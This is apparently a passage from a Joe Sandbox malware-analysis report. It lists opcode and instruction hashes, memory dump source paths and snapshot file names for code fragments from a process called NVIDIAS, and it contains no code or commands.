                                                                        • Instruction ID: 559ce479228a372c110505aca40c67717875a1598639231f2adff47fd664e688
                                                                        • Opcode Fuzzy Hash: e2ae8feb010c67a522d5f1f46d7d14ba91e7fc808437af9b5096be206178e1ed
                                                                        • Instruction Fuzzy Hash: DDF059577086940FD32211292C6477DAFE2FFCA521F19049BE481C7242EA148C068B61
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cb29ea1be374ffaae2897793d3e2ce90eab6ba432b844d27b5b497da95cc5779
                                                                        • Instruction ID: 69aa82ed36955a491af1b9abb607bd59fa61adb7a772cef6616567e45897983d
                                                                        • Opcode Fuzzy Hash: cb29ea1be374ffaae2897793d3e2ce90eab6ba432b844d27b5b497da95cc5779
                                                                        • Instruction Fuzzy Hash: 77F0B453A0D7D10FD72B96192CB016E6F737B9A550B190997C141CB293DA14C805C762
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1210588960.0000000001A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A1D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_1a1d000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 59a17a06d8ab66debdba8c63aa160b5d2928d8314915d942bd7a9d0ed9d14290
                                                                        • Instruction ID: 9de0f6e363de614065eadf4cf4c26cdd376f2d9ff4ad20f27da51dba46f4eb6a
                                                                        • Opcode Fuzzy Hash: 59a17a06d8ab66debdba8c63aa160b5d2928d8314915d942bd7a9d0ed9d14290
                                                                        • Instruction Fuzzy Hash: AAF0C272404384AEE7118F4ADCC8B62FF98EB41634F18C45AED084E287C3789844CAB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 23054a8d527f25425436ae804b113b4fbb335becbcf615b0826e1e5a70701c5a
                                                                        • Instruction ID: 323879b1fe3450ce665b6bab7dba1375515d282741f326a0d55fb08f498f2d5b
                                                                        • Opcode Fuzzy Hash: 23054a8d527f25425436ae804b113b4fbb335becbcf615b0826e1e5a70701c5a
                                                                        • Instruction Fuzzy Hash: 33F0E237F007646B8719AA7D649442EFBEBEFCA1B23290169D845AB740CE71AC42C3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5635d556ac5502e8e84cbc4da6133fe836f268b5f127c7c171ac6540527fdf9e
                                                                        • Instruction ID: e45dd0695af73240a822a4d0a2b7ed8380876582df0df4ddf01554a540d6957a
                                                                        • Opcode Fuzzy Hash: 5635d556ac5502e8e84cbc4da6133fe836f268b5f127c7c171ac6540527fdf9e
                                                                        • Instruction Fuzzy Hash: 71F0820371D3D40FD32B562928282AD3B716BC7424B1E01DBC040CF6E7D994CC4983A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5462d5439e2ec42de52d196b8ae33981a8742c246aef6eba245bd9ff7150d62
                                                                        • Instruction ID: a324ed5ae67d1f27feb58d68cc6bdc133d42f7ab679ef589b79407615112173e
                                                                        • Opcode Fuzzy Hash: f5462d5439e2ec42de52d196b8ae33981a8742c246aef6eba245bd9ff7150d62
                                                                        • Instruction Fuzzy Hash: 21F0F635705A509FC319CB38D854C55B7B1FF8632235941F9E8059B361CB32EC41CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b6075307fd239d8207ee4013419104defce03e3f36a6d88e44a946cf6b54481
                                                                        • Instruction ID: 71e86e8e018daa8d785d9e67573361f903a1c0eacb960b81980dc541b767d66f
                                                                        • Opcode Fuzzy Hash: 6b6075307fd239d8207ee4013419104defce03e3f36a6d88e44a946cf6b54481
                                                                        • Instruction Fuzzy Hash: 64F0B431A042944FD749ABB89C5429CBBF1EF87190F1841EAC449F7562DA254C4ACB65
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dded768630a2a8e4a055dfe68e914745a3af19e72fcd02b28babaeba2f17224a
                                                                        • Instruction ID: 2b1622ec13bb5b8af4995812050715e8eec00afd6bb2cb88a18707dd17e5e323
                                                                        • Opcode Fuzzy Hash: dded768630a2a8e4a055dfe68e914745a3af19e72fcd02b28babaeba2f17224a
                                                                        • Instruction Fuzzy Hash: E7F08C367445204FC300DB7ED944926BBF5EF8E16231A40BAE10DCB372DA258C048750
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 720decd8e52a2b3766974c4c61aa909437326058dbd8c295fe10620ded608f10
                                                                        • Instruction ID: 2c5cd5058187f4938c9bb1bf2c724663edfe6c4b5a4cbef65cd2e66d5df8c950
                                                                        • Opcode Fuzzy Hash: 720decd8e52a2b3766974c4c61aa909437326058dbd8c295fe10620ded608f10
                                                                        • Instruction Fuzzy Hash: 47F0159641E7C08FD72722344D2A2A83F31BA9B210B8F45DBC4D0CE2F3D519890BDB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 272d39e7d56726f19b25ea90268638bb43946f51dc7dfb875660542b2ca7302a
                                                                        • Instruction ID: a19d30f519fa4c7658a42ce94cdc081a2d215f618c6d930c85d7d203d974a73a
                                                                        • Opcode Fuzzy Hash: 272d39e7d56726f19b25ea90268638bb43946f51dc7dfb875660542b2ca7302a
                                                                        • Instruction Fuzzy Hash: CBF08212A5E3D54FC72756282C385AD7BB13DC341131A04DBC481CF2A3C958CC4AD3A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d737e45ac3af130a04005d02b8fa933f8a837f3fd275cbbfd6d152bf2b05815
                                                                        • Instruction ID: 9d0c673dd174dc9f25ca4ddd45437353ec32e4a942ef27b6b962bbb5e1d762a7
                                                                        • Opcode Fuzzy Hash: 6d737e45ac3af130a04005d02b8fa933f8a837f3fd275cbbfd6d152bf2b05815
                                                                        • Instruction Fuzzy Hash: 42F02737B082489FDB158A9AD804A9A7BA6FFC6330F15C0B6E481C7761E6B4CC018361
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e88a8102d03d1a27ea172743e9bd16f716386d3a664714eecacdd6390adb075
                                                                        • Instruction ID: e2117dd636c0182b1c74b1c827175bfe09b2ab96f41ca71665ea88579683d0d1
                                                                        • Opcode Fuzzy Hash: 8e88a8102d03d1a27ea172743e9bd16f716386d3a664714eecacdd6390adb075
                                                                        • Instruction Fuzzy Hash: 06F0A0767005204FC3009B6DD98491ABBE9EFC957131A40BAE14DCB331DA25CC008750
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ef113a0688b33b5471808839ed5a6be0215acb726a33ed1926bb56b966d9131
                                                                        • Instruction ID: 4d19cd8759af1a0738f14a1babacd0c5a56a15531e6d2f47ad729948e74a706e
                                                                        • Opcode Fuzzy Hash: 0ef113a0688b33b5471808839ed5a6be0215acb726a33ed1926bb56b966d9131
                                                                        • Instruction Fuzzy Hash: 0DF03070E14209EFDB48DFA8D65469CBBF2FF94210F1085A99809E7344EB719F45DB41
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a290d0b14141e7fca60beed835af54bcefb2a1a7702c0d014b8acd7ebbde8ff6
                                                                        • Instruction ID: 6945fd2566a40e72b069d3f38a14ffb46168b316ed5518340882b00d2122c8ea
                                                                        • Opcode Fuzzy Hash: a290d0b14141e7fca60beed835af54bcefb2a1a7702c0d014b8acd7ebbde8ff6
                                                                        • Instruction Fuzzy Hash: 02F08232A1024ADBDF14DB64C4256EFBBB69F88700F018936D413F7280DFB15A06D6D2
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76007fe831a26e166c1b835dcdaa095f809af4b9bf396d9e4f7979546d46f5aa
                                                                        • Instruction ID: 6294747d6f4d9fb6b8e00ebed47083e9505901ccdea52933524c4dbd4e535ae5
                                                                        • Opcode Fuzzy Hash: 76007fe831a26e166c1b835dcdaa095f809af4b9bf396d9e4f7979546d46f5aa
                                                                        • Instruction Fuzzy Hash: A1F05E356057108FC3259A7898909AA77E2DE8622131545AEE04ADB721CA35AC02C750
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 33403a1cab0dc7db29a32716bc841eaf64d7bc1dcbc6dcc60b5eb4b3bf3c06fd
                                                                        • Instruction ID: 8463a03da24a674b9ae60e14c62dfedec945c769257be58ec0bc7db1c3f55402
                                                                        • Opcode Fuzzy Hash: 33403a1cab0dc7db29a32716bc841eaf64d7bc1dcbc6dcc60b5eb4b3bf3c06fd
                                                                        • Instruction Fuzzy Hash: 71F06D1A50E3C45FD71743748D266AE7FB67B87101F6A82E7C440CF1A3DA188D4AD362
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3a45506244b088147c40e35132b7b80ed9477062be841b2d0ce0ee480343d620
                                                                        • Instruction ID: 636e414a68465c828eb8abee0e2b2fe4cb83280b830eaa640c7b56b9d8ac6f91
                                                                        • Opcode Fuzzy Hash: 3a45506244b088147c40e35132b7b80ed9477062be841b2d0ce0ee480343d620
                                                                        • Instruction Fuzzy Hash: F5E01A6A08E7C10FC70312706E6A2EA7F30AB97254B1A02DBD084CF5A3C119854AD312
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4371c61d7d27916a069170d254bbee005828e9bc67b7b270310a49474c1e6316
                                                                        • Instruction ID: 1fb016324739dd4ae8089c308882137a6214c80a79860119811c1bc9d69a3ddf
                                                                        • Opcode Fuzzy Hash: 4371c61d7d27916a069170d254bbee005828e9bc67b7b270310a49474c1e6316
                                                                        • Instruction Fuzzy Hash: 58F096B1D006668FEB58EF6494457AEBFF1AF04210F080579D25AE3A80EB346656CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bfb935f9f7687a5f9a1817683290979d0c699bbed92afd3836b9a2aecd75a72b
                                                                        • Instruction ID: 315aeab7c2408cf8f60ed2430b8d28c2da5483ca75fcfd3053d8453394858c81
                                                                        • Opcode Fuzzy Hash: bfb935f9f7687a5f9a1817683290979d0c699bbed92afd3836b9a2aecd75a72b
                                                                        • Instruction Fuzzy Hash: E3F0123AB016149FC3199B38D858915F7A6EB8522635645B9DC199B760DA32EC42CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1952051c8d45600559c5f52736bb5452d35ea4bbb3863010efa4b93aed996aa9
                                                                        • Instruction ID: a51e304ceb52dbf44bc664f3fcb6f48cc46d8281eacdd52fc372bfb47fa9cc22
                                                                        • Opcode Fuzzy Hash: 1952051c8d45600559c5f52736bb5452d35ea4bbb3863010efa4b93aed996aa9
                                                                        • Instruction Fuzzy Hash: 96E0A0306007014B8A08EB6EE8509AEB7DAFEC1624714C97DD40A8F214DF62E9078791
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eeec9af4818dde7a475e2d5424a54fd9346c94addc9a414bca2d5c6d62428cae
                                                                        • Instruction ID: 4bda6e4eea7815da216bc318b072b4c12fa89cd67a8b5a1b9a07e12fd1ecdfad
                                                                        • Opcode Fuzzy Hash: eeec9af4818dde7a475e2d5424a54fd9346c94addc9a414bca2d5c6d62428cae
                                                                        • Instruction Fuzzy Hash: 7AE0D86614D7C05FC713A7749C116163F789F83604B1A89DBD046CF163C02ECC0AC762
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 981c3c0f13ec2f2ee34cd6bf41019c933b021c56012857e26db41ca4bb90fda7
                                                                        • Instruction ID: 1fb98369975d762c98e5e17241bbb31ceebf684b7b657ba79a48004852e59dcc
                                                                        • Opcode Fuzzy Hash: 981c3c0f13ec2f2ee34cd6bf41019c933b021c56012857e26db41ca4bb90fda7
                                                                        • Instruction Fuzzy Hash: 77E0653A7005085B87089A5ED454D6EB7ABFFC9520724C066E406CB724DF71CC01D791
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b57f247cd0545e78f72504aabf0f2a7345e17b1916837f2767aefeb314b0daef
                                                                        • Instruction ID: 234ae12d108fa78340f41109b9ef5461dc617752d085d0731fa4bf70c8f95ade
                                                                        • Opcode Fuzzy Hash: b57f247cd0545e78f72504aabf0f2a7345e17b1916837f2767aefeb314b0daef
                                                                        • Instruction Fuzzy Hash: C2F0E539B057149FC3159B34A890915BBF6FFC926230601BEE509CB350CB359C06CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5259c5349948558fc4e527933b1129ad5dfa3d14b8754b73df34260f2b70aa87
                                                                        • Instruction ID: e0b50675f6c25534c7e4977f20ea175f0f1b5b1a77b368e12ee40cbfa0200c80
                                                                        • Opcode Fuzzy Hash: 5259c5349948558fc4e527933b1129ad5dfa3d14b8754b73df34260f2b70aa87
                                                                        • Instruction Fuzzy Hash: E2F03035A017108FC3159B38985091A77F6DFCA265319847ED44ADB761DB39EC02C750
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: faebffd89996a9abc140f613d0d8556a23be17ab3e9cef40bac09edfea35eb1e
                                                                        • Instruction ID: ae9df0cc80b9996a6a12c19071a7f46f9f6d96237ba52c084811a1ef14fe9f76
                                                                        • Opcode Fuzzy Hash: faebffd89996a9abc140f613d0d8556a23be17ab3e9cef40bac09edfea35eb1e
                                                                        • Instruction Fuzzy Hash: E0F0656554E3C44FC7039B6459644D07FB1AD4721035A01DBD845CF2B3D1199D8AD712
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 30df275b812409cbb0902c7ef11e8fc581e922b75d9f411e7194410bed4c4f08
                                                                        • Instruction ID: 3b41380a88286731eff82c5dd01fd235001f2d12d26c06aab2d71220d1df8ca8
                                                                        • Opcode Fuzzy Hash: 30df275b812409cbb0902c7ef11e8fc581e922b75d9f411e7194410bed4c4f08
                                                                        • Instruction Fuzzy Hash: 3DF05EB0D1066A8FDB68EF6994053AEBFF5AF04200F080479D64AE3640EB346616CB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 32237816ba454c8662a4816d08df56d74edea8f70fac1815cfabc4571ec97d14
                                                                        • Instruction ID: 3928611804428f876d6c8ab814bb7a1b1c0ada4bb349b034867b292c656bc5ea
                                                                        • Opcode Fuzzy Hash: 32237816ba454c8662a4816d08df56d74edea8f70fac1815cfabc4571ec97d14
                                                                        • Instruction Fuzzy Hash: A3F03039B04A548FC316DB38985082A7BB6EFCA22531941BAD019CF371CA75DC02C790
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f6306548678124cc0ab9072b612c1e429f819c88bd839eb7088fda5a350b8dd1
                                                                        • Instruction ID: 8042f82488759cd3d65675ca6cd663d0a87dd33d12ff1b7f9f2f677066f43cc4
                                                                        • Opcode Fuzzy Hash: f6306548678124cc0ab9072b612c1e429f819c88bd839eb7088fda5a350b8dd1
                                                                        • Instruction Fuzzy Hash: 74F08C70A0A344AFCB01DFF4D95129C7BF2EF46210B1284EBE440CB252C6340A05DB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9b75c5a5bff8c119db1e0d5e523181af67a5f6a1938d450ffb0f7cdb02338e77
                                                                        • Instruction ID: dc2cd3bf30203c10c38c42cc8253bdd399cf59dbe474dedebdde6f8b957c7cf0
                                                                        • Opcode Fuzzy Hash: 9b75c5a5bff8c119db1e0d5e523181af67a5f6a1938d450ffb0f7cdb02338e77
                                                                        • Instruction Fuzzy Hash: 35E0DF39700618AB8314AA29B88491ABBEAFBC9272310003DE40AD7340CF32AC02C7A4
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 320fc0416552163deb5e126f43e61f6f7a4600bae365321898507bc41169b856
                                                                        • Instruction ID: 7462032c681afda2ceb4125d093e190350a848f4dcf6387fd5bb5e58b6b34603
                                                                        • Opcode Fuzzy Hash: 320fc0416552163deb5e126f43e61f6f7a4600bae365321898507bc41169b856
                                                                        • Instruction Fuzzy Hash: DAE039366002008FC314DB68D49099A77F6EF8A21135501AAE009DB722CB35EC02CB10
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 64f0914ec4bcdb6988e02eb6d121767597f256e394c317ec2dec2d17cef881ab
                                                                        • Instruction ID: a2afcb77ea8cd9cd7124ace3f40275297bd5c0352459bc3820126665cd42eca9
                                                                        • Opcode Fuzzy Hash: 64f0914ec4bcdb6988e02eb6d121767597f256e394c317ec2dec2d17cef881ab
                                                                        • Instruction Fuzzy Hash: 2DE0ED1651E3C18FD7178774592D6796FA17E87120B5E84EB8080CB5F3C469848A8722
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1607b0967058016f222cb566363c2b1f055a74daf5dbea7e9fdfc56b208385df
                                                                        • Instruction ID: 913cb6cdd4db7a50f9246a64a309286d5cad91f4cafcfd56a6251f46ea11c420
                                                                        • Opcode Fuzzy Hash: 1607b0967058016f222cb566363c2b1f055a74daf5dbea7e9fdfc56b208385df
                                                                        • Instruction Fuzzy Hash: F5E0E51255E3C18FD71B57344C291687FB17E8720174A84DBD481CF2F3D46998898766
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e00133f418b48bd98470c9ea00751747168c29d21e3a1ad619861ae51be1ed47
                                                                        • Instruction ID: c91d035863d2d0b4a24aa5cd65df5cfff2610e2693970bc0eff60abc081a9866
                                                                        • Opcode Fuzzy Hash: e00133f418b48bd98470c9ea00751747168c29d21e3a1ad619861ae51be1ed47
                                                                        • Instruction Fuzzy Hash: 9AE04F2664A7894FE72726344D317BE7BB27FC3140FA984BBC081CE652D63D8846D316
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 144f061a68481689372dbbc07e72c2e53881fc3f781d043217361ed90876c7d4
                                                                        • Instruction ID: a9a7188cd8bd587bd6f136a47b73833ac44f0af92ebacb4e307445aac31407eb
                                                                        • Opcode Fuzzy Hash: 144f061a68481689372dbbc07e72c2e53881fc3f781d043217361ed90876c7d4
                                                                        • Instruction Fuzzy Hash: 2CE0866B149B849FD71A5A249D14BBC3B22FBC62C0F6D44E38841CF963C5158547D622
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a41be3a8616420b4cd5d1f0b6f78f36a9939ada0762d4194ea4908dcb125a69c
                                                                        • Instruction ID: 7b44b053d502631f398fd92cd313672658ab8de2fcfad6df2a45476b4bb93cd4
                                                                        • Opcode Fuzzy Hash: a41be3a8616420b4cd5d1f0b6f78f36a9939ada0762d4194ea4908dcb125a69c
                                                                        • Instruction Fuzzy Hash: 9CE04836B04509EF4B1859DED404CAB77ABFFC5630724C066E545C7324EAB1CC1197A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
